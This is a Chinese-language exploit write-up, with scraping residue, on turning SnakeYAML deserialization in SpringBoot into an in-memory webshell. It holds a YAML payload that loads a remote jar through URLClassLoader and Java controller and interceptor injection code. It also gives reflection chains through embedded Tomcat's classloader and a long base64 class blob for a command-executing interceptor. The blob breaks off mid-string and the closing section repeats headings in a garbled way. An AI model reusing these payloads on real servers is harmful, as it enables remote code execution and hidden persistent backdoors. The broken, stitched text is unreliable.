SnakeYAML漏洞利用与SpringBoot内存马注入技术分析<\/h1>

1. 前言<\/h2>
本文详细分析SnakeYAML漏洞在SpringBoot环境下的利用方式，特别是针对不出网环境下的内存马注入技术。文章将涵盖以下关键内容：<\/p>
SnakeYAML反序列化漏洞基础利用<\/li>
SpringBoot环境下内存马注入的难点分析<\/li>
内嵌Tomcat ClassLoader的特殊利用方式<\/li>
完整的内存马注入解决方案<\/li> <\/ul>
2. SnakeYAML漏洞基础利用<\/h2>

2.1 漏洞原理<\/h3>
SnakeYAML是一个流行的YAML解析库，当反序列化不受信任的YAML内容时，可能导致远程代码执行。关键利用方式是通过`!!javax.script.ScriptEngineManager<\/code>触发恶意代码执行。<\/p>`

2.2 基本利用方式<\/h3>
!!javax.script.ScriptEngineManager<\/span> [
<\/span><\/span>  !!java.net.URLClassLoader<\/span> [[
<\/span><\/span>    !!java.net.URL<\/span> ["http:\/\/127.0.0.1:9090\/payload.jar"<\/span>]
<\/span><\/span>  ]]
<\/span><\/span>]
<\/span><\/span><\/code><\/pre>2.3 利用条件<\/h3>

存在\/env<\/code>等配置信息泄露端点<\/li>
可修改spring.cloud.bootstrap.location<\/code>字段<\/li>
能够上传任意文件到可访问目录<\/li>
<\/ol>
3. SpringBoot内存马注入技术<\/h2>
3.1 常见内存马类型<\/h3>
在Spring框架中，主要有两种内存马注入方式：<\/p>

控制器(Controller)注入<\/strong>：注册新的路由绑定恶意方法<\/li>
拦截器(Interceptor)注入<\/strong>：在拦截器链中插入恶意拦截器<\/li>
<\/ol>
3.2 控制器注入示例<\/h3>
@RestController<\/span>
<\/span><\/span>@EnableAutoConfiguration<\/span>
<\/span><\/span>public<\/span> class<\/span> ControllerInject<\/span> {<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>"\/inject2"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String inject<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 获取应用上下文
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>            .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 注册恶意路由
<\/span><\/span><\/span><\/span>        RequestMappingHandlerMapping r =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>        Method method =<\/span> Evil.<\/span>class<\/span>.<\/span>getMethods<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>"\/exec"<\/span>);<\/span>
<\/span><\/span>        RequestMethodsRequestCondition ms =<\/span> new<\/span> RequestMethodsRequestCondition();<\/span>
<\/span><\/span>        RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>url,<\/span> ms,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        r.<\/span>registerMapping<\/span>(<\/span>info,<\/span> new<\/span> Evil(),<\/span> method);<\/span>
<\/span><\/span>        return<\/span> "success"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.3 拦截器注入示例<\/h3>
@RestController<\/span>
<\/span><\/span>@EnableAutoConfiguration<\/span>
<\/span><\/span>public<\/span> class<\/span> InterceptorInject<\/span> {<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>"\/inject"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String inject<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 获取应用上下文
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>            .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 获取并修改拦截器链
<\/span><\/span><\/span><\/span>        RequestMappingHandlerMapping abstractHandlerMapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>        Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        ArrayList<<\/span>Object><\/span> adaptedInterceptors =<\/span> (<\/span>ArrayList<<\/span>Object>)<\/span> field.<\/span>get<\/span>(<\/span>abstractHandlerMapping);<\/span>
<\/span><\/span>        adaptedInterceptors.<\/span>add<\/span>(<\/span>new<\/span> Madao());<\/span>
<\/span><\/span>        return<\/span> "success"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 利用难点分析<\/h2>
4.1 线程上下文问题<\/h3>
通过SnakeYAML漏洞执行代码时，会创建新线程，导致无法直接获取Web应用的上下文：<\/p>
\/\/ 在恶意jar中执行会报错
<\/span><\/span><\/span><\/span>WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>    .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4.2 类加载器隔离问题<\/h3>
恶意jar由URLClassLoader加载，与主线程的类加载器不同，导致类转换异常：<\/p>
\/\/ 会抛出ClassCastException
<\/span><\/span><\/span><\/span>adaptedInterceptors.<\/span>add<\/span>(<\/span>new<\/span> Madao());<\/span>
<\/span><\/span><\/code><\/pre>4.3 LiveBeansView不可用<\/h3>
传统通过反射获取LiveBeansView<\/code>的方式在SpringBoot中不可行：<\/p>
\/\/ 会返回null
<\/span><\/span><\/span><\/span>Field filed =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.context.support.LiveBeansView"<\/span>)<\/span>
<\/span><\/span>    .<\/span>getDeclaredField<\/span>(<\/span>"applicationContexts"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>5. 内嵌Tomcat ClassLoader利用方案<\/h2>
5.1 利用链分析<\/h3>
通过分析线程上下文，发现可以从内嵌Tomcat的ClassLoader获取应用上下文：<\/p>

获取当前线程的ClassLoader（TomcatEmbeddedWebappClassLoader）<\/li>
获取Resources对象<\/li>
获取StandardContext对象<\/li>
获取ApplicationContext对象<\/li>
从属性中获取WebApplicationContext<\/li>
<\/ol>
5.2 关键代码实现<\/h3>
\/\/ 获取内嵌Tomcat上下文
<\/span><\/span><\/span><\/span>ClassLoader tomcatClassLoader =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>Method getResources =<\/span> tomcatClassLoader.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>()<\/span>
<\/span><\/span>    .<\/span>getMethod<\/span>(<\/span>"getResources"<\/span>);<\/span>
<\/span><\/span>Object resources =<\/span> getResources.<\/span>invoke<\/span>(<\/span>tomcatClassLoader);<\/span>
<\/span><\/span>
<\/span><\/span>Method getContext =<\/span> resources.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getContext"<\/span>);<\/span>
<\/span><\/span>Object tomcatEmbeddedContext =<\/span> getContext.<\/span>invoke<\/span>(<\/span>resources);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取ApplicationContext
<\/span><\/span><\/span><\/span>Field contextField =<\/span> tomcatEmbeddedContext.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>()<\/span>
<\/span><\/span>    .<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span>
<\/span><\/span>contextField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object applicationContext =<\/span> contextField.<\/span>get<\/span>(<\/span>tomcatEmbeddedContext);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 获取WebApplicationContext
<\/span><\/span><\/span><\/span>Method getAttribute =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getMethod<\/span>(<\/span>"getAttribute"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>Object webApplicationContext =<\/span> getAttribute.<\/span>invoke<\/span>(<\/span>applicationContext,<\/span> 
<\/span><\/span>    "org.springframework.web.context.WebApplicationContext.ROOT"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>5.3 解决类加载器隔离问题<\/h3>
使用主线程的ClassLoader加载恶意拦截器类：<\/p>
\/\/ 获取主线程的类加载器
<\/span><\/span><\/span><\/span>Method getParentCLassLoader =<\/span> tomcatEmbeddedContext.<\/span>getClass<\/span>()<\/span>
<\/span><\/span>    .<\/span>getMethod<\/span>(<\/span>"getParentClassLoader"<\/span>);<\/span>
<\/span><\/span>ClassLoader parentClassLoader =<\/span> (<\/span>ClassLoader)<\/span> getParentCLassLoader.<\/span>invoke<\/span>(<\/span>tomcatEmbeddedContext);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用主ClassLoader定义类
<\/span><\/span><\/span><\/span>Class<?><\/span> madaoClass =<\/span> defineClass(<\/span>parentClassLoader,<\/span> "yv66vgAAADQAlQo..."<\/span>);<\/span>
<\/span><\/span>adaptedInterceptors.<\/span>add<\/span>(<\/span>madaoClass.<\/span>newInstance<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>6. 完整利用流程<\/h2>
6.1 恶意jar包结构<\/h3>
artsploit\/
    AwesomeScriptEngineFactory.class
    Evil.class
    Madao.class
META-INF\/
    services\/
        javax.script.ScriptEngineFactory
<\/code><\/pre>
6.2 AwesomeScriptEngineFactory核心代码<\/h3>
public<\/span> class<\/span> AwesomeScriptEngineFactory<\/span> implements<\/span> ScriptEngineFactory {<\/span>
<\/span><\/span>    public<\/span> AwesomeScriptEngineFactory<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 定义并实例化Evil类
<\/span><\/span><\/span><\/span>            Class evilClass =<\/span> defineClass(<\/span>this<\/span>.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>                "<\/span>yv66vgAAADQAzAoACQBnCgBoAGkKAGgAagoACQBrCgAHAGwIADsHAG0KAAcAbgcAbwoAcABxCAA+<\/span>CAByCgAHAHMKAHQAdQoAdAB2CABDBwB3CAB4CABHCABICAB5CABLCQB6AHsIAHwKAH0AfgcAfwoAGgCACwCBAIILAIEAgwoABwCECACFCgARAIYIAIcHAIgIAIkKAC8AigoABwCLCgAaAIwIAF4HAGQJAI0AjgoABwCPCgBwAHUKAJAAkQoAkgCTCgCNAJQHAJUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQABaQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABHRoaXMBABBMYXJ0c3Bsb2l0L0V2aWw7AQARdG9tY2F0Q2xhc3NMb2FkZXIBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEADGdldFJlc291cmNlcwEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAJcmVzb3VyY2VzAQAKZ2V0Q29udGV4dAEAFXRvbWNhdEVtYmVkZGVkQ29udGV4dAEADGNvbnRleHRGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABJhcHBsaWNhdGlvbkNvbnRleHQBAAxnZXRBdHRyaWJ1dGUBABV3ZWJBcHBsaWNhdGlvbkNvbnRleHQBABphYnN0cmFjdEFwcGxpY2F0aW9uQ29udGV4dAEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAHZ2V0QmVhbgEAFmdldEJlYW5EZWZpbml0aW9uTmFtZXMBABZhYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQAFZmllbGQBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAUZ2V0UGFyZW50Q0xhc3NMb2FkZXIBABFwYXJlbnRDbGFzc0xvYWRlcgEACm1hZGFvQ2xhc3MBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAUTGphdmEvbGFuZy9DbGFzczwqPjsBAClMamF2YS91dGlsL0FycmF5TGlzdDxMamF2YS9sYW5nL09iamVjdDs+<\/span>OwEADVN0YWNrTWFwVGFibGUHAJUHAIgHAJYHAG8HAJcHAG0HAH8HAJgBAApFeGNlcHRpb25zBwCZAQALZGVmaW5lQ2xhc3MBADwoTGphdmEvbGFuZy9DbGFzc0xvYWRlcjtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAtjbGFzc0xvYWRlcgEACWNsYXNzQnl0ZQEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACWV2YWxCeXRlcwEAAltCAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwAMAAxBwCaDACbAJwMAJ0AngwAnwCgDAChAKABAA9qYXZhL2xhbmcvQ2xhc3MMAKIAowEAEGphdmEvbGFuZy9PYmplY3QHAJYMAKQApQEAB2NvbnRleHQMAKYApwcAlwwAqACpDACqAKsBABBqYXZhL2xhbmcvU3RyaW5nAQA6b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5XZWJBcHBsaWNhdGlvbkNvbnRleHQuUk9PVAEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcHAKwMAK0ArgEAAzFvawcArwwAsACxAQATamF2YS91dGlsL0FycmF5TGlzdAwAsgCzBwCYDAC0ALUMALYAtwwAuAC5AQAFTWFkYW8MALoAuwEAFGdldFBhcmVudENsYXNzTG9hZGVyAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQzEeXY2NnZnQUFBRFFBbFFvQUlnQklDQUJKQ3dCS0FFc0lBRXdLQUUwQVRnb0FDZ0JQQ0FCUUNnQUtBRkVLQUZJQVV3Y0FWQWdBVlFnQVZnb0FVZ0JYQ0FCWUNBQlpCd0JhQndCYkNnQmNBRjBLQUJFQVhnb0FFQUJmQndCZ0NnQVZBRWdLQUJBQVlRb0FGUUJpQ2dBVkFHTUtBQlVBWkFzQVpRQm1DZ0FLQUdjS0FHZ0FhUW9BYUFCcUNnQm9BR3NMQUdVQWJBY0FiUWNBYmdFQUJqeHBibWwwUGdFQUF5Z3BWZ0VBQkVOdlpHVUJBQTlNYVc1bFRuVnRZbVZ5VkdGaWJHVUJBQkpNYjJOaGJGWmhjbWxoWW14bFZHRmliR1VCQUFSMGFHbHpBUUFSVEdGeWRITndiRzlwZEM5TllXUmhienNCQUFsd2NtVklZVzVrYkdVQkFHUW9UR3BoZG1GNEwzTmxjblpzWlhRdmFIUjBjQzlJZEhSd1UyVnlkbXhsZEZKbGNYVmxjM1E3VEdwaGRtRjRMM05sY25ac1pYUXZhSFIwY0M5SWRIUndVMlZ5ZG14bGRGSmxjM0J2Ym5ObE8weHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bGFBUUFIY0hKdlkyVnpjd0VBRTB4cVlYWmhMMnhoYm1jdlVISnZZMlZ6Y3pzQkFBNWlkV1ptWlhKbFpGSmxZV1JsY2dFQUdFeHFZWFpoTDJsdkwwSjFabVpsY21Wa1VtVmhaR1Z5T3dFQURYTjBjbWx1WjBKMWFXeGtaWElCQUJsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WjBKMWFXeGtaWEk3QVFBRWJHbHVaUUVBRWt4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUEyTnRaQUVBQjNKbGNYVmxjM1FCQUNkTWFtRjJZWGd2YzJWeWRteGxkQzlvZEhSd0wwaDBkSEJUWlhKMmJHVjBVbVZ4ZFdWemREc0JBQWh5WlhOd2IyNXpaUUVBS0V4cVlYWmhlQzl6WlhKMmJHVjBMMmgwZEhBdlNIUjBjRk5sY25ac1pYUlNaWE53YjI1elpUc0JBQWRvWVc1a2JHVnlBUUFTVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBTlUzUmhZMnROWVhCVVlXSnNaUWNBVkFjQWJ3Y0FXZ2NBWUFjQWJRY0FjQWNBY1FjQWNnRUFDa1Y0WTJWd2RHbHZibk1IQUhNQkFBcFRiM1Z5WTJWR2FXeGxBUUFLVFdGa1lXOHVhbUYyWVF3QUl3QWtBUUFHY0dGemMyVnlCd0J3REFCMEFIVUJBQWR2Y3k1dVlXMWxCd0IyREFCM0FIVU1BSGdBZVFFQUEzZHBiZ3dBZWdCN0J3QjhEQUI5QUg0QkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQUhZMjFrTG1WNFpRRUFBaTlqREFCL0FJQUJBQVJpWVhOb0FRQUNMV01CQUJacVlYWmhMMmx2TDBKMVptWmxjbVZrVW1WaFpHVnlBUUFaYW1GMllTOXBieTlKYm5CMWRGTjBjbVZoYlZKbFlXUmxjZ2NBYnd3QWdRQ0NEQUFqQUlNTUFDTUFoQUVBRjJwaGRtRXZiR0Z1Wnk5VGRISnBibWRDZFdsc1pHVnlEQUNGQUhrTUFJWUFod3dBaGdDSURBQ0pBSGtIQUhFTUFJb0Fpd3dBakFDTkJ3Q09EQUNQQUpBTUFKRUFKQXdBa2dBa0RBQ1RBSlFCQUE5aGNuUnpjR3h2YVhRdlRXRmtZVzhCQUVGdmNtY3ZjM0J5YVc1blpuSmhiV1YzYjNKckwzZGxZaTl6WlhKMmJHVjBMMmhoYm1Sc1pYSXZTR0Z1Wkd4bGNrbHVkR1Z5WTJWd2RHOXlRV1JoY0hSbGNnRUFFV3BoZG1FdmJHRnVaeTlRY205alpYTnpBUUFsYW1GMllYZ3ZjMlZ5ZG14bGRDOW9kSFJ3TDBoMGRIQlRaWEoyYkdWMFVtVnhkV1Z6ZEFFQUptcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsYzNCdmJuTmxBUUFRYW1GMllTOXNZVzVuTDA5aWFtVmpkQUVBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0QkFBeG5aWFJRWVhKaGJXVjBaWElCQUNZb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk93RUFFR3BoZG1FdmJHRnVaeTlUZVhOMFpXMEJBQXRuWlhSUWNtOXdaWEowZVFFQUMzUnZURzkzWlhKRFlYTmxBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBaGpiMjUwWVdsdWN3RUFHeWhNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUc3BXZ0VBRVdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsQVFBS1oyVjBVblZ1ZEdsdFpRRUFGU2dwVEdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsT3dFQUJHVjRaV01CQUNnb1cweHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MMUJ5YjJObGMzTTdBUUFPWjJWMFNXNXdkWFJUZEhKbFlXMEJBQmNvS1V4cVlYWmhMMmx2TDBsdWNIVjBVM1J5WldGdE93RUFHQ2hNYW1GMllTOXBieTlKYm5CMWRGTjBjbVZoYlRzcFZnRUFFeWhNYW1GMllTOXBieTlTWldGa1pYSTdLVllCQUFoeVpXRmtUR2x1WlFFQUJtRndjR1Z1WkFFQUxTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtZENkV2xzWkdWeU93RUFIQ2hES1V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuUW5WcGJHUmxjanNCQUFoMGIxTjBjbWx1WndFQUQyZGxkRTkxZEhCMWRGTjBjbVZoYlFFQUpTZ3BUR3BoZG1GNEwzTmxjblpzWlhRdlUyVnlkbXhsZEU5MWRIQjFkRk4wY21WaGJUc0JBQWhuWlhSQ2VYUmxjd0VBQkNncFcwSUJBQ0ZxWVhaaGVDOXpaWEoyYkdWMEwxTmxjblpzWlhSUGRYUndkWFJUZEhKbFlXMEJBQVYzY21sMFpRRUFCU2hiUWlsV0FRQUZabXgxYzJnQkFBVmpiRzl6WlFFQUNYTmxibVJGY25KdmNnRUFCQ2hKS1ZZQUlRQWhBQ0lBQUFBQUFBSUFBUUFqQUNRQUFRQWxBQUFBTHdBQkFBRUFBQUFGS3JjQUFiRUFBQUFDQUNZQUFBQUdBQUVBQUFBS0FDY0FBQUFNQUFFQUFBQUZBQ2dBS1FBQUFBRUFLZ0FyQUFJQUpRQUFBZDBBQlFBSkFBQUEzQ3NTQXJrQUF3SUF4Z0RTS3hJQ3VRQURBZ0E2QkJrRXhnQzRFZ1M0QUFXMkFBWVNCN1lBQ0prQUliZ0FDUWE5QUFwWkF4SUxVMWtFRWd4VFdRVVpCRk8yQUEwNkJhY0FIcmdBQ1FhOUFBcFpBeElPVTFrRUVnOVRXUVVaQkZPMkFBMDZCYnNBRUZtN0FCRlpHUVcyQUJLM0FCTzNBQlE2QnJzQUZWbTNBQlk2QnhrR3RnQVhXVG9JeGdBZ0dRZTdBQlZadHdBV0dRaTJBQmdRQ3JZQUdiWUFHcllBR0Zlbi85c3N1UUFiQVFBWkI3WUFHcllBSExZQUhTeTVBQnNCQUxZQUhpeTVBQnNCQUxZQUg2Y0FEQ3dSQVpTNUFDQUNBQU9zQkt3QUFBQURBQ1lBQUFCR0FCRUFBQUFNQUFzQURRQVZBQTRBR2dBUUFDb0FFUUJJQUJNQVl3QVdBSGdBRndDQkFCb0FqQUFiQUtrQUhnQzZBQjhBd3dBZ0FNd0FJUURQQUNJQTJBQWtBTm9BSmdBbkFBQUFaZ0FLQUVVQUF3QXNBQzBBQlFCakFHa0FMQUF0QUFVQWVBQlVBQzRBTHdBR0FJRUFTd0F3QURFQUJ3Q0pBRU1BTWdBekFBZ0FGUURGQURRQU13QUVBQUFBM0FBb0FDa0FBQUFBQU53QU5RQTJBQUVBQUFEY0FEY0FPQUFDQUFBQTNBQTVBRG9BQXdBN0FBQUFOd0FIL0FCSUJ3QTgvQUFhQndBOS9RQWRCd0ErQndBLy9BQW5Cd0E4L3dBbEFBVUhBRUFIQUVFSEFFSUhBRU1IQUR3QUFBajZBQUVBUkFBQUFBUUFBUUJGQUFFQVJnQUFBQUlBUnc9PQwAXgBfDAC8ALcMAL0AvgcAvwwAwABGDADBAKMHAMIMAMMAxgcAxwwAyADJDADKAMsBAA5hcnRzcGxvaXQvRXZpbAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQASamF2YS91dGlsL0l0ZXJhdG9yAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQANZ2V0U3VwZXJjbGFzcwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0Oyl
<\/span><\/span><\/code><\/pre>
SnakeYAML漏洞利用与SpringBoot内存马注入技术分析<\/h1>

2. SnakeYAML漏洞基础利用<\/h2>

2.1 漏洞原理<\/h3> SnakeYAML是一个流行的YAML解析库，当反序列化不受信任的YAML内容时，可能导致远程代码执行。关键利用方式是通过!!javax.script.ScriptEngineManager<\/code>触发恶意代码执行。<\/p>

3. SpringBoot内存马注入技术<\/h2>

4. 利用难点分析<\/h2>

5. 内嵌Tomcat ClassLoader利用方案<\/h2>

6. 完整利用流程<\/h2>

2.1 漏洞原理<\/h3>
SnakeYAML是一个流行的YAML解析库，当反序列化不受信任的YAML内容时，可能导致远程代码执行。关键利用方式是通过`!!javax.script.ScriptEngineManager<\/code>触发恶意代码执行。<\/p>`
